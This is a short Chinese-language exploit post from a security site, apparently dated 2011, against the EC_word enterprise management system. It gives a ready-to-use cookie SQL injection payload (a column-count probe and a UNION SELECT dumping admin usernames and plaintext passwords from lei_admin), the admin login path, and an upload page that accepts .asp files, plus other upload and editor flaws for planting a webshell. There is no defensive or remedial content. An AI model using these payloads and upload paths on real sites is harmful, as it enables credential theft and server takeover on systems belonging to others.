首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
EC_word企业管理系统注入漏洞利用
来源:vfocus.net 作者:哈客 发布时间:2011-07-11  

该程序采用枫叶通用防注入1.0 asp版,此防注入完全鸡肋,该网站程序pro_show.asp有cookies注入或者变型注入,注入前可以先判断一下字段数:ORdeR By xx

注入语句:ANd 1=1 UNiOn SElEcT 1,username,3,4,5,6,7,8,9,10,password1,12,13,14,15,16,17,18,19,20,21,22,23,24,25 FrOm lei_admin

密码为明文,后台地址:admin/index/login.asp

后台上传地址:admin/inc/upfile.htm 可直接上传asp文件  上传路径admin/upimg/
有些后台有双文件上传漏洞:admin/inc/upfiletwo.asp

有些后台还有eweb编辑器


form:哈客


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·dz7.2 HTTP 头注入漏洞
·dotnot编辑器漏洞
·shopxp网上购物系统v7.4爆密码0d
·KesionCMS 科汛网站管理系统V7.0
·卓讯智能化网站管理系统 EmteEas
·深喉cms文件包含漏洞致使数据库
·睿拓旅游信息门户系统 1.1 注入
·奶茶加盟店网站源码 1.0 注入漏
·玉叶随风企业建站系统多处漏洞
·养生馆建站系统多处漏洞
·Discuz!NT3.6 跨站漏洞 官网测
·网络商城购物系统v3.0全功能版
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved